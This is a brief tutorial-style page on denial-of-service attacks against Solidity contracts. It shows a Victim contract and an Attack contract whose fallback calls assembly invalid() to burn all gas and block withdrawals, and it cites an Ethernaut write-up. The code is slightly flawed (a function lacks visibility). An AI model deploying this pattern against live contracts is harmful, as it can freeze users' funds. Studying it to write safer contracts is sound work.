Solidity Denial of Service Attack

Last modified: 2023-09-30

Blockchain Ethereum

We can denial the Solidity execution by consuming all gas using various ways.

DoS with Assembly Invalid Function

The invalid() opcode in in-line assembly consumes all the gas and causes Dos for the contract.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Victim {
	address public owner;
	uint public balance;

	function withdrawUser(address _address) {
		(bool success, ) = _address.call{value: balance}("");
		// Some code ...
	}
}

contract Attack {
  Victim target;

  constructor(address _targetAddress) {
    target = Victim(_targetAddress);
    target.withdrawUser(address(this));
  }

  fallback() payable external {
    assembly {
      invalid()
    }
  }
}

References

https://coinsbench.com/20-denial-ethernaut-explained-92bc3f7562ec

Smart Contract

Others

Solidity Denial of Service Attack

DoS with Assembly Invalid Function

References

ON THIS PAGE